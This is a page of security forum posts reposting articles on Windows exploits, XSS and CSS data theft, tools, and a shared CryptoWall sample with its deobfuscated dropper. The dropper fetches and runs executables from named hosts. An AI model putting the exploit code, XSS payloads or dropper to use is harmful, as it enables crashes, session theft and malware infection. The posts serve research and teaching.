Nytro

Create Your Own CMD.XLS For several years now I’ve been using my modified cmd.exe from Excel. I’m not releasing this spreadsheet with my cmd code, but I release the VBA code. You can create your own spreadsheet (or Word document) with this VBA file. If you don’t know how, here’s a video: Sursa: http://blog.didierstevens.com/2016/02/10/create-your-own-cmd-xls/

/* Source: https://github.com/koczkatamas/CVE-2016-0051 Proof-of-concept BSoD (Blue Screen of Death) code for CVE-2016-0051 (MS-016). Full Proof of Concept: https://github.com/koczkatamas/CVE-2016-0051/archive/master.zip https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39432.zip */ using System; using System.IO; using System.Linq; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Text; using System.Threading; namespace BSoD { class Program { static void StartFakeWebDavServer(int port) { new Thread(() => { var server = new TcpListener(IPAddress.Loopback, port); server.Start(); while (true) { using (var client = server.AcceptTcpClient()) using (var stream = client.GetStream()) using (var reader = new StreamReader(stream, Encoding.GetEncoding("iso-8859-1"))) using (var writer = new StreamWriter(stream, Encoding.GetEncoding("iso-8859-1")) { AutoFlush = true }) { Console.WriteLine(" =============== BEGIN REQUEST =============== "); Func<string> rl = () => { var line = reader.ReadLine(); Console.WriteLine("< " + line); return line; }; Action<string> wl = outData => { Console.WriteLine(String.Join("\n", outData.Split('\n').Select(x => "> " + x))); writer.Write(outData); }; var header = rl().Split(' '); while (!string.IsNullOrWhiteSpace(rl())) { } if (header[0] == "OPTIONS") wl("HTTP/1.1 200 OK\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nAllow: OPTIONS,GET,HEAD,PROPFIND\r\n\r\n"); else if (header[0] == "PROPFIND") { var body = String.Format(@" <?xml version=""1.0"" encoding=""UTF-8""?> <D:multistatus xmlns:D=""DAV:""> <D:response> <D:href>{0}</D:href> <D:propstat> <D:prop> <D:creationdate>{1:s}Z</D:creationdate> <D:getcontentlength>{3}</D:getcontentlength> <D:getcontenttype>{4}</D:getcontenttype> <D:getetag>{5}</D:getetag> <D:getlastmodified>{6:R}</D:getlastmodified> <D:resourcetype>{8}</D:resourcetype> <D:supportedlock></D:supportedlock> <D:ishidden>{7}</D:ishidden> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus>", header[1], DateTime.UtcNow.ToUniversalTime(), "", "0", "", "", DateTime.UtcNow.ToUniversalTime(), 0, header[1].Contains("file") ? "" : "<D:collection></D:collection>").Trim(); wl("HTTP/1.1 207 Multi-Status\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nContent-Length: " + body.Length + "\r\nContent-Type: text/xml\r\n\r\n" + body); } else wl("HTTP/1.1 500 Internal Server Error\r\n\r\n"); Console.WriteLine(" =============== END REQUEST =============== "); } } }) { IsBackground = true, Name = "WebDAV server thread" }.Start(); } [StructLayout(LayoutKind.Sequential)] private class NETRESOURCE { public uint dwScope = 0; public uint dwType = 0; public uint dwDisplayType = 0; public uint dwUsage = 0; public string lpLocalName = null; public string lpRemoteName = null; public string lpComment = null; public string lpProvider = null; } [DllImport("mpr.dll")] private static extern int WNetAddConnection2(NETRESOURCE lpNetResource, string lpPassword, string lpUsername, int dwFlags); [DllImport("Advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern int DuplicateEncryptionInfoFile(string srcFileName, string dstFileName, uint dwCreationDistribution, uint dwAttributes, IntPtr lpSecurityAttributes); public static void Main(string[] args) { var p = new Random().Next(1024, 65535); StartFakeWebDavServer(p); var addConnectionResult = WNetAddConnection2(new NETRESOURCE() { lpRemoteName = @"\\127.0.0.1@" + p + @"\folder\" }, null, null, 0); Console.WriteLine("WNetAddConnection2 = " + addConnectionResult); var duplicateEncryptionInfoResult = DuplicateEncryptionInfoFile(@"\\127.0.0.1@" + p + @"\folder\file", "x", 2, 128, IntPtr.Zero); Console.WriteLine("DuplicateEncryptionInfoFile = " + duplicateEncryptionInfoResult); Console.WriteLine("BSoD did not happen."); Console.ReadLine(); } } } Sursa: https://www.exploit-db.com/exploits/39432/

Vezi stanga. https://rstforums.com/forum/profile/19350-garryone/reputation/?type=forums_topic_post&change_section=1

Vezi in stanga.

Instaleaza pe server un server de mail. Acel "smtp" dupa care sunt unii obsedati si nici nu stiu ce este.

https://rstforums.com/forum/notifications/options/

Exploiting a blind cross-site scripting vulnerability A cross-site scripting vulnerability (also known as XSS) is a vulnerability that allows hackers to execute malicious scripts into a web application. Looking at the statistics of Google’s vulnerability reward program -Google rewards hackers for vulnerabilities they report to them- more than 65% of the vulnerabilities reported are XSS vulnerabilities. The basic principle of an XSS is that you insert a payload which then reflects back to you on the same page, for example on your profile page. A blind XSS goes further than that. A blind XSS doesn’t reflect back to you, but it reflects back to systems like a CRM or a Server Administration panel. Since these systems are mostly designed to be used internally, they are not always developed with security in mind. This “No one can reach it anyway” approach, can for a hacker be a ticket to the “holy grail”. If an attacker wants to exploit a blind XSS he needs to do three things: Detect the vulnerability. Wait till someone opens the payload on an internal system. Exploit it. This requires a couple of tricks. First you need to write a script that calls back to you when your payload is executed. This can be accomplished fairly easily. For example the script given below will ping the “log server” with the given domain-name and then execute the JavaScript parsed back by that log server onto the vulnerable web application. Doing this you can set-up an interactive shell. This is an example code, for this to work you also need a working back-end to interact with the script. By using JavaScript modules like for instance html2canvas it’s incredible easy to create screenshots of the victims application which could give a lot of insight about how the targeted application works and how you could exploit it further. Secondly, you likely want to view the HTML of the targeted page, and by using document.documentElement.innerHTML it’s possible to get the content of the entire page. 192.168.1.10 is open. As the XSS is likely executed on a device somewhere in a network, you could also use JavaScript to scan that infrastructure. You could run for example an IP range discovery or a port scan. So, testing your internal (web)applications for vulnerabilities is also very important, even if they are not “reachable” from the outside. Because, as you can see above, they may be reachable anyway. It just takes a little bit more effort. - Olivier Beg Sursa: http://blog.zerocopter.com/post/138552423798/exploiting-a-blind-cross-site-scripting

NetworkMiner 2.0 Released I'm proud to announce the release of NetworkMiner2.0 today! There are several longed-for features that are part of this major release, such as: SMB/CIFS parser now supports file extraction from SMB write operations. Added parser for SMB2 protocol (read and write). Additional IEC-104 commands implemented. Added Modbus/TCP parser (as requested by attendees at 4SICS 2014). Improved SMTP parser. Improved FTP parser. Improved DNS parser. GUI flickering is heavily reduced when loading PCAP files or doing live sniffing. Extraction of web server favicon images (shown in Hosts tab). Added "Keyword filter" to several tabs (see more details below). Image: NetworkMiner 2.0 showing hosts in nitroba.pcap from Digital Corpora For those not familiar with NetworkMiner, here's a short summary: Keyword Filtering Users of NetworkMiner sometimes run into a needle-in-the-haystack problem when trying to find some specific entry in the Files, Parameters or DNS tab. The technique most analysts have been using so far is to sort the data based a column of interest (by clicking the column header) and then scroll down to the row they are looking for. This method isn't optimal, which is why several users have requested support for keyword filtering. I've personally received several of these requests when teaching my Networks Forensics class. I'm therefore happy to say that version 2.0 of NetworkMiner has a built-in filtering capability for the data displayed in the following tabs: Files Parameters DNS Messages Sessions Image: Parameters tab with filter “user-agent” (case insensitive) The filter allows rows to be filtered based on one or several keywords. The entered keywords are matched against all text in all columns of the tab. A drop-down menu in the filter bar allows the analyst to chose “Exact Phrase”, “All Words” or “Any Word” as search criteria for the entered keywords. More Data in the Parameters Tab We have previously held back on what data we add to the Parameters tab. However, now with the filtering feature in place, we decided to add a lot more information to the Parameters list. Some of the new parameter types available in version 2.0 are: HTTP request methods HTTP URI's HTTP response status codes HTTP headers SMB Tree Connect AndX Request (attempts to connect to a named file share) SMB NT Create AndX Request (mapping of filename to file handle ID) SMB2 Connect Requests (attempts to connect to a named file share) SMB2 File ID (mapping of filename to file handle ID) SMB2 file timestamps (Created, Modified and Accessed). Image: SMB2 file timestamps shown in Parameters tab A Warning to Malware Analysts NetworkMiner has previously appended the “.octet-stream” or “x-msdos-program” extension to all binary files being downloaded over HTTP (since those are the MIME types used for Windows executables). As of version 2.0, however, files named {something}.exe will not be renamed this way. This means that there is now a risk of accidental execution of such files, for example if the user right-clicks an .exe file in NetworkMiner and selects “Open File”. If you analyze PCAP files that might contain malware, then our recommendation is to perform the analysis on some other operating system than Windows. NetworkMiner runs fine on Linux as well as Mac OS X. NetworkMiner Professional On top of the updates provided in the free version of NetworkMiner we have added a few additional useful features to NetworkMiner Professional. The new features in the Pro version include: Advanced OS fingerprinting. Identifies a great range of operating systems and device types (including Apple iOS, Android and many others) based on DHCP traffic. Web Browsing Analysis. A new GUI tab called "Browsers" has been added, which shows what URLs each unique browser has visited. More details on this feature will be released shortly in a separate blog post. User Settings. Settings in GUI can now be saved to make them persistent between executions. Better Export Logs. The CSV format used for exporting data has been improved, we have also added support for XML formatted data export. Image: Andoid, Apple iOS, Mac OS and Windows detected in captured DHCP traffic from a WiFi network. Defang Executables Remember the warning about .exe files downloaded over HTTP no longer get the “.octet-stream” extension? To counter the risk of accidental execution of malware we've added a defang feature to NetworkMiner Professional. When enabled, this feature will rename files like “malware.exe” to “malware.exe_” in order to prevent execution. It is not only .exe files being renamed. At the moment the following file extensions are defanged by appending “_” to the extension: The defang feature renames files regardless if they were transmitted over HTTP, FTP, TFTP, SMB, SMB2, SMTP or any other protocol supported by NetworkMiner. Please note that the defang feature is turned off by default. So if you wanna protect yourself from accidental execution, make sure to enable this feature in the NetworkMiner Settings (available under Tools > Settings). Credits There are many people who have provided feedback and ideas for improvements that are now part of NetworkMiner 2.0. I would especially like to thank Eric Kollmann (author of Satori) for his impressive ability to find bugs in beta releases. I would also like to thank Ulf Skoglund, Dmitry Shchemelev, @xredumb, Sabin and Andrew Brantfor their feedback on improvements in DNS, TCP, HTTP and SMTP parsing. Finally, I wanna give a shout-out to Steffen Thorkildsen for spawning the idea for a browser tracking feature. Sursa: http://www.netresec.com/?page=Blog&month=2016-02&post=NetworkMiner-2-0-Released

Cross-Origin CSS Attacks Revisited (feat. UTF-16) February 10, 2016 | Tags: Bug Bounty, CSS Prologue If you are a boring person like me and read specs in spare time, you may have come across this potential attack described by the CSP 2 spec: Lax Parsing Unlike JavaScript which stops parsing when a syntax error is encountered, CSS parsing rules allow to ignore certain illegal parts in quirks mode. How This Was Abused Back in 2009, Chris Evans discovered that such behavior can lead to cross-domain theft. The way it worked is to find a page which reflects GET paremeters, inject crafted payload and import it in an attacker controlled page. Since a picture is worth a thousand words, here is a picture which depicts the attack: In short, attackers inject two strings, pre-string ({}#f{font-family:') and post-string (';}) that surround the secret data. The junk is ignored while the payload then turns the secret data into a CSS property (font-family in this case), and can be revealed in computed style. Note that the injected strings do not contain harmful characters (angle brackets) so they will generally not be escaped. Ultimately this attack can lead to data exfiltration. Since cookie is sent along the request, the stolen data can contain a CSRF token or personal information. There are however certain restrictions of this attack: The extracted data needs to sit in between the pre-string and post-string. Also having 2 injection points is not uncommon yet not very usual The extracted data cannot contain both single and double quotes at the same time (because the data needs to be treated as a CSS string) The extracted data cannot contain line breaks (CSS string does not support multiple lines) These conditions are not easy to meet, especially the "no line breaks" requirement as they are inevitable in modern coding style. How It ended Internet Explorer and Firefox disabled the ability to import CSS with incorrect MIME type (text/css) cross-origin. Webkit-based browsers on the other hand, used strict parsing (stop parsing when error encountered) for cross-origin CSS for the sake of compatibility. The approach Webkit adopted is also suggested by CSP 2: Thinking Out Of The Box The suggested defense looks like a perfect balance: It resolves the issue while not breaking old websites which use incorrect MIME type for CSS. Well, it surely does not break those websites, but it is not unbreakable either. It assumes that it is unlikely for attackers to influence a document in a way such that the content is a valid CSS. What I am going to tell you is that we can indeed make a document syntactically valid with a little help from charset. Manipulating Charest The CSS spec defines the precedence of what charset should be used for a CSS: BOM Content-Type header (e.g. Content-Type: text/html; charset=utf-8) Environment encoding (the charset attribute of <link>) If a page does not specific BOM or charset on Content-Type, the encoding decision will fallback to environemnt encoding which we can control. BOM is not an issue since it is discouraged according to the Unicode standard and nobody uses it. Content-Type header is a bit tough because modern frameworks have it set by default, though it is not uncommon to see a page without charset specified on Content-Type due to verious reasons. Facebook is an example which does not have charset set through Content-Type but instead relies on <meta charset>. Fiddling CSS Syntax Now to the most interesting part: forcing a document to be a valid CSS. Before that, we need to understand the syntax. A CSS is a stylesheet. It has to start with @-rules or rulesets. Since It is nearly impossible for a document to start with @ or pull it out of thin air, we are only interested in ruleset. A rule is essentially selector + block. Selectors have different types but most of them contain identifier. According to the spec, identifiers can contain only the characters [a-zA-Z0-9] and ISO 10646 characters U+00A0 and higher, plus the hyphen (-) and the underscore (_). Apparently, CSS supports wide range (U+00A0 ~ U+10FFFFF) of Unicode characters to be valid identifiers, but penalizes ASCII characters as a single bracket or quote which is common is a HTML document is treated invalid. How UTF-16 Comes Into Play Unlike most of the charset, UTF-16 always maps 2 or more bytes into 1 character, even for ASCII. Now you start seeing the pattern: we can tell the parser that the document should be decoded as UTF-16, and all in a sudden the whole document becomes a valid identifier! This is because the transformation "eliminates" all ASCII characters, including line breaks and quotes (a NUL byte is needed for padding for an acutal ASCII character in UTF-16). We then add a wildcard selector so that the following rule matches an element. So we now have the selector settled, the parser continues to receive block. At this point we just need to find an injection point and make a block to complete our payload. For declaration, we need a property that accepts arbitrary string value so that we can steal the secret data. font-family is the perfect choice as it supports not only string but also identifier. Let's see what we've got so far: Identifier(junk), * { font-family: Identifier(secret data) And that's it! ...Wait, where is the closing brace (})? Actually we can ignore it and it still remains valid. As per spec, when the parser reaches EOF (End-of-File), theblock will be closed automatically. Taking advantage of it, we only need one injection point to perform the attack. Nosniff? You may wonder: isn't X-Content-Type-Options exactly there to prevent such attack? Unfortunately, for some reasons Webkit does not honor this header when importing CSS. In other word, having X-Content-Type-Options: nosniff has no effect when the document is being treated as an external CSS. Limitation To sum up, the attack works when the following conditions are met: The target does not have charset set in the Content-Type header The injection point does not sanitize NUL byte Compared with the original attack, this possibility to perform the attack is tremendously increased. PoC The following PoC will demonstrate how this attack can steal cookies of victim's from phpinfo. Phpinfo is a common information leakage which contains limited server information and HTTP request information. Normally it is immune from XSS, with this attack we can exfiltrate httpOnly cookies from victim since it meets all the attack requirement (i.e. no charset on header and accept NUL byte). PoC (Chrome 43, Safari 8 or iOS 8): http://innerht.ml/csstheft/phpinfo.html Although patched in modern browsers, I reckon there are still some homemade browsers which are vulnerable. Further Reading There is also a similar attack for its counterpart JavaScript called XSSI First-Party-Only Cookies is a proposed solution which prevents cookies being sent off in a third-party context Entry Point Regulation is an alternative which restricts documents being used as external resouces, although IMO the manifest is rather verbose References Original Report to Chromium CSS railway diagrams Sursa: http://blog.innerht.ml/cross-origin-css-attacks-revisited-feat-utf-16/

FAST FULL-FEATURED SSL SCANNER Posted on 10/02/2016, 13:06 By Johnny Cash SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify mis-configurations affecting their SSL servers. Key features Multi-processed and multi-threaded scanning: it’s very fast. Support for all SSL protocols, from SSL 2.0 to TLS 1.2. SSLyze can also be used as a library, in order to run scans and process the results directly from Python. Performance testing: session resumption and TLS tickets support. Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more. Server certificate validation and revocation checking through OCSP stapling. Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP, PostGres and FTP. Support for client certificates when scanning servers that perform mutual authentication. Installation SSLyze can be installed directly via pip: pip install sslyze or git clone https://github.com/nabla-c0d3/sslyze /opt/sslyze cd /opt/sslyze pip install -r requirements.txt --target ./lib Usage python sslyze_cli.py –regular www.yahoo.com:443 www.google.com Platforms SSLyze has been tested on the following platforms: Windows 7 (32 and 64 bits), Debian 7 (32 and 64 bits), OS X El Capitan. Sursa: http://securityblog.gr/3267/fast-full-featured-ssl-scanner/

An Introduction to DOM XSS Published on February 10, 2016 By HollyGraceful on Web Application Security Document Object Model Based Cross-Site Scripting (DOM Based XSS) is a type of Cross-site Scripting where instead of the payloads being stored or reflected by the remote web server and appearing in the response HTML the payload is instead stored in the DOM and processed insecurely by JavaScript. For those unfamiliar with what the DOM is, a short and fairly untechnical overview is available here. The impact, and exploitation of DOM-XSS, is essentially the same as reflected or stored however the detection is a little different, as you can’t simply check the server responses and build up a payload. For example if you’re using Burp Suite for testing Burp doesn’t parse or execute JavaScript and therefore it won’t be too much help there. (It will however look for DOM-XSS through static analysis and pick up on issues such as location.hash ending up in document.write). This is the idea of “sinks” and “sources”, where a vulnerability may occur if an attacker is able to control a source and the data retreived makes it into a sink without filtering, validation or encoding. The data may be processed and changed in the centre as long as a payload can be snuck along too. Essentially we concentrate on areas where user input may find its way into potentially vulnerable functions. It may be useful to remember that Firefox can show the DOM-Source by highlighting an area of the page and selecting “View Selection Source”. Generally I will manually review JavaScript and try and link between areas of user input and potentially dangerous functions. Here I’ll try to demonstrate the concept through a real-world example found on a recent Penetration Test. Hopefully this will highlight the concepts as well as some of the difficulties in finding these issues: During a recent Penetration Test I can across an interesting piece of JavaScript which turned out to be vulnerable, so I’ve cleaned it up, anonymised it and present it here as a vulnerable example. In the actual application this was a collection of four functions being loaded from different locations and was a little more complex than what you see here, I’ve simply reduced the complexity so that it doesn’t distract too much from the general idea. The idea here was that I tied a source to a sink and that led to an exploit. The following code is similar to what I found during my Penetration Test: 1. <html><body> 2. <script> 3. function OnLoad() { 4. var foundFrag = get_fragment(); 5. return foundFrag; 6. } 7. 8. function get_fragment() { 9. var r4c='(.*?)'; 10. var results = location.hash.match('.*input=token('+r4c+');'); 11. 12. if(results){ 13. return (unescape (results[2])); 14. } else { 15. return null; 16. } 17. } 18. 19. display_session = OnLoad(); 20. document.write("Your session ID was: "+display_session+"<br><br>")</script> 21. An error occurred... 22. </body><html> First of all I noticed the function document.write() executing with a parameter containing get_fragment(). I traced document.write through display_session to OnLoad() which executes get_fragment() which takes input from the URL. In reality that link between user input and vulnerable function was a little more blurry, with some additional processing being done to “results”, however you can see the idea here. Through the application scripts we try and tie together user inputs and vulnerable functions. If we can get unfiltered user input into document.write() we can deface the web application or potentially steal confidential data. Location.hash is being used as input to that function so let’s start there because that’s user input (an attacker could craft a malicious link with a payload in the fragment). For those unfamiliar with JavaScript the line in question is number 10. It’s taking location.hash which is the contents of the URL after the “fragment”, that’s after the # at the end of the URL, such as: http://gracefulsecurity.com/example?#foobar It’s taking the word “foobar” from above and applying a Regular Expression to it. The expression looks for the string “input=token” anywhere in the fragment and reads from that string up to a semi-colon character (that’s what r4c is doing, it’s a capture group that captures any character using the multiple wildcard “.*”). Therefore in this case, if I wanted to execute a simple XSS proof-of-concept such as alert(1) I could play this in the URL fragment after the string input=token but before a semicolon like this: http://gracefulsecurity.com/example?#input=token<script>alert(1)</script>; With this, the script would find intput=token and read from there up to the semi-colon, then place that input within the document.write function and the following happens: A simple XSS proof-of-concept, here however you might thing that a more complex payload would not be possible as the application stops reading when it spots a semi-colon and so something as simple as alert(1);alert(2) would not be possible, however thanks to the use of unescape() on the returned data I can use a payload like this: http://gracefulsecurity.com/example?#input=token<script>alert(1)%3balert(2)</script>; Where I am replacing the ; character with its URI encoded equivalent! No I can write my malicious JavaScript payload and craft a link to send to a victim just like I would with standard reflected cross-site scripting! So all in all detection and payload generation is a little trickier usually, but the act of exploitation and the impact is just the same! Detection is harder because I can’t use a tool like Burp Suite to view the modified responses (as it’s all handled client site by the browser). However by using tools like firebox, by using the developer console, or by statically analysing the JavaScript we can still pick up on these issues simply. Remediation It’s worth noting that modern browsers have made steps to restrict the exploit-ability of issues like reflected XSS and DOM-Based XSS. However there are still things that can be done by developers. Generally speaking HTML Entity encoding none alphanumeric user input as it is rendered to the browser will effectively block an attackers ability to execute scripts in the malicious ways described above whilst preserving the functionality of the application. It’s not enough to block keywords such as “script” (and certainly alert!), it is more important to block the characters required to write effective JavaScript, such as: ( ) ; " ' I build on this idea in more detail within my article about Web Application Defence, which can befound here. Sursa: https://www.gracefulsecurity.com/an-introduction-to-dom-xss/

L-am gasit pe Twitter: Pentru cei care nu stiu: Acesta este un MALWARE (de fapt RANSOMEWARE, sau "virus"). Daca nu stiti ce e, nu e pentru voi. E pentru cei care vor sa il analizeze. Fisierul e atasat. Parola arhivei e "RST". CryptoWall.zip

Ca idee, se poate dezobfusca foarte usor. La final se poate vedea: "this[h91](n49);". E un apel de functie cu un anume parametru. Ce se intampla daca afisam acel parametru (n49)? Adica inlocuim "this[h91]" cu "document.write" si: var b = "yatrazone.com exquisitecorpse.co.nz.s74023.gridserver.com maineselectrealestate.com".split(" "); var ws = WScript.CreateObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"302988"; var xo = WScript.CreateObject("MSXML2.XMLHTTP"); var xa = WScript.CreateObject("ADODB.Stream"); var ld = 0; for (var n=1; n<=3; n++) { for (var i=ld; i 1000) { dn = 1; xa.position = 0; xa.saveToFile(fn+n+".exe",2); try { ws.Run(fn+n+".exe",1,0); } catch (er) { }; }; xa.close(); }; if (dn == 1) { ld = i; break; }; } catch (er) { }; }; }; PS: Cred ca mizeria asta (cu WScript.Shell) merge doar pe IE6 maxim IE7.

https://www.gofundme.com/w8nvtk7d

Ia un AllView.

O sa punem la vot mai multe astfel de sugestii. Astfel, veti avea impresia ca e democratie

IPBoard te pune sa alegi: Reputation sau Like. Cred ca e de fapt aceeasi chestie.

Nu cred ca faci lucruri atat de nasoale incat sa fie nevoie sa treci prin foarte multe layere de anonimizare. Un VPS/VPN cu Tor cred ca este de ajuns.

VPN -> Tor -> VPS -> Tor -> VPN repetat de 2-3 ori! Asta mergand cu masca pe fata intr-un McDonalds si schimband adresa MAC! Apoi fugi in alt oras! Nu cred ca are rost sa mai spun ca trebuie sa iti faci alt buletin si cateva operatii estetice ulterior...

La naiba, v-ati dat seama... In caz ca nu va puteti da singuri seama care sunt eu din acea poza: Stiu, am facut putina burta, nu va mai luati de mine

Nu pot face nimic in legatura cu link-urile vechi, au alt ID... Nu am ce face. Sa vad daca pot gasi o legatura intre ele...

O sa luam in considerare, deocamdata ramane asa.

Iti face asa mereu, sau doar din cand in cand? E posibil sa fie de la serviciul lor de chat. In caz ca nu stiati, discutiile de pe chat trec pe la ei. O sa vad ce pot face in privinta asta. Dar e posibil ca din cauza asta sa nu mearga.

Se pot pune imagini pe chat? Nu stiam.

Am facut. Pe bune, l-am pus pe RST. A iesit un cacat. Erau o tona de probleme, nu merge nimic, se incarcau pagini si in 20 de secunde... Era o mizerie.